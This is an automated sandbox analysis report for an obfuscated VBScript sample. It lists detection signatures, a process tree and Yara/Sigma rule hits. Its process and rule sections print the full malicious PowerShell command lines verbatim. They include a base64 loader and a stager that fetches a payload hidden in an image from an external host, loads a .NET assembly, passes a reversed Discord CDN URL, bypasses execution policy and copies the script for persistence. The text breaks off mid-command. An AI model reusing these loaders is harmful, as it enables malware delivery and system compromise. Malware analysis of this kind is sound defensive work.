Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
upload.vbs

Overview

General Information

Sample name:upload.vbs
Analysis ID:1448041
MD5:5ab6db2920ff322e5dece25eca2bd5fa
SHA1:33af3fa156381c99dab23f2a65ebb173b44815b6
SHA256:493016356036cb4f5e8990500ee0d73a45f13df39035184539331686b6076716
Tags:vbs
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Creates autostart registry keys with suspicious values (likely registry only malware)
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Found URL in obfuscated visual basic script code
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 3628 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\upload.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 4952 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDgDgTreNQDgTrevDgTreDcDgTreMgDgTrewDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDYDgTreMwDgTrewDgTreDcDgTreNgDgTrezDgTreDQDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreCYDgTreODgTreDgTreyDgTreDEDgTreZQBjDgTreGEDgTreMQDgTrewDgTreDYDgTreOQDgTre3DgTreGEDgTreMDgTreBjDgTreDYDgTreNwBkDgTreGYDgTreMgBlDgTreDYDgTreNwBiDgTreGUDgTreZgDgTre3DgTreDQDgTreZQDgTre5DgTreDgDgTreODgTreDgTreyDgTreDYDgTreMDgTreDgTrezDgTreDgDgTreNQDgTre3DgTreGUDgTreYQDgTre0DgTreDUDgTreODgTreBmDgTreGYDgTreOQDgTre1DgTreDkDgTreZDgTreBhDgTreGEDgTreYwDgTrewDgTreDYDgTreYwBlDgTreGYDgTreMQBlDgTreDDgTreDgTreZgDgTre0DgTreDIDgTreZQDgTre9DgTreG0DgTreaDgTreDgTremDgTreGQDgTreZQDgTrewDgTreGQDgTreMDgTreDgTre1DgTreDYDgTreNgDgTre9DgTreHMDgTreaQDgTremDgTreGQDgTreNgDgTreyDgTreDIDgTreMgDgTre1DgTreDYDgTreNgDgTre9DgTreHgDgTreZQDgTre/DgTreHQDgTreeDgTreB0DgTreC4DgTreZDgTreBhDgTreG8DgTrebDgTreBwDgTreHUDgTreLwDgTreyDgTreDYDgTreMwDgTre3DgTreDgDgTreOQDgTrexDgTreDMDgTreMDgTreDgTrezDgTreDEDgTreNQDgTre5DgTreDEDgTreNgDgTrezDgTreDQDgTreMgDgTrexDgTreC8DgTreMwDgTre0DgTreDYDgTreMQDgTre5DgTreDEDgTreMQDgTrexDgTreDUDgTreMwDgTreyDgTreDDgTreDgTreNwDgTreyDgTreDYDgTreNQDgTrezDgTreDIDgTreMQDgTrevDgTreHMDgTredDgTreBuDgTreGUDgTrebQBoDgTreGMDgTreYQB0DgTreHQDgTreYQDgTrevDgTreG0DgTrebwBjDgTreC4DgTrecDgTreBwDgTreGEDgTreZDgTreByDgTreG8DgTreYwBzDgTreGkDgTreZDgTreDgTreuDgTreG4DgTreZDgTreBjDgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGMDgTrebwBnDgTreG4DgTreaQB0DgTreGkDgTredgBvDgTreCcDgTreLDgTreDgTrenDgTreFIDgTreZQBnDgTreEEDgTrecwBtDgTreCcDgTreLDgTreDgTrenDgTreCcDgTreKQDgTrepDgTreH0DgTreIDgTreB9DgTreDgTre==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1360 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&821eca10697a0c67df2e67bef74e9882603857ea458ff959daac06cef1e0f42e=mh&de0d0566=si&d6222566=xe?txt.daolpu/2637891303159163421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 7384 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\cognitivo.vbs MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • wscript.exe (PID: 7636 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\cognitivo.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • wscript.exe (PID: 7788 cmdline: "C:\Windows\System32\WScript.exe" "C:\ProgramData\cognitivo.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 4952JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 4952INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x1012c:$b2: ::FromBase64String(
    • 0x11697:$b2: ::FromBase64String(
    • 0x11d3b:$b2: ::FromBase64String(
    • 0x12506:$b2: ::FromBase64String(
    • 0x12b60:$b2: ::FromBase64String(
    • 0x16889b:$b2: ::FromBase64String(
    • 0xff91:$b3: ::UTF8.GetString(
    • 0x114fc:$b3: ::UTF8.GetString(
    • 0x11ba0:$b3: ::UTF8.GetString(
    • 0x1236b:$b3: ::UTF8.GetString(
    • 0x129c5:$b3: ::UTF8.GetString(
    • 0x168700:$b3: ::UTF8.GetString(
    • 0x38b66:$s1: -join
    • 0xce55c:$s1: -join
    • 0xde9ac:$s1: -join
    • 0x809c4:$s3: reverse
    • 0x8a88b:$s3: reverse
    • 0x9255a:$s3: reverse
    • 0x99199:$s3: reverse
    • 0x9b1e0:$s3: reverse
    • 0xa620f:$s3: reverse
    Process Memory Space: powershell.exe PID: 1360JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 1360INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x4eec:$b2: ::FromBase64String(
      • 0x553b:$b2: ::FromBase64String(
      • 0x1eeab:$b2: ::FromBase64String(
      • 0x21593:$b2: ::FromBase64String(
      • 0x21b71:$b2: ::FromBase64String(
      • 0x294e4:$b2: ::FromBase64String(
      • 0x29b33:$b2: ::FromBase64String(
      • 0x2d12a:$b2: ::FromBase64String(
      • 0x2d8eb:$b2: ::FromBase64String(
      • 0xaea84:$b2: ::FromBase64String(
      • 0xb74db:$b2: ::FromBase64String(
      • 0x4d51:$b3: ::UTF8.GetString(
      • 0x53a0:$b3: ::UTF8.GetString(
      • 0x1ed10:$b3: ::UTF8.GetString(
      • 0x213f8:$b3: ::UTF8.GetString(
      • 0x219d6:$b3: ::UTF8.GetString(
      • 0x29349:$b3: ::UTF8.GetString(
      • 0x29998:$b3: ::UTF8.GetString(
      • 0x2cf8f:$b3: ::UTF8.GetString(
      • 0x2d750:$b3: ::UTF8.GetString(
      • 0xae8e9:$b3: ::UTF8.GetString(
      SourceRuleDescriptionAuthorStrings
      amsi64_1360.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

        Spreading

        barindex
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('&821eca10697a0c67df2e67bef74e9882603857ea458ff959daac06cef1e0f42e=mh&de0d0566=si&d6222566=xe?txt.daolpu/2637891303159163421/3461911153207265321/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , '1' , 'C:\ProgramData\' , 'cognitivo','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634', 'https://uploaddeimagens.com.br/images/004/785/720/original/new_image.jpg?1716307634'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMe

        System Summary

        barindex
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDg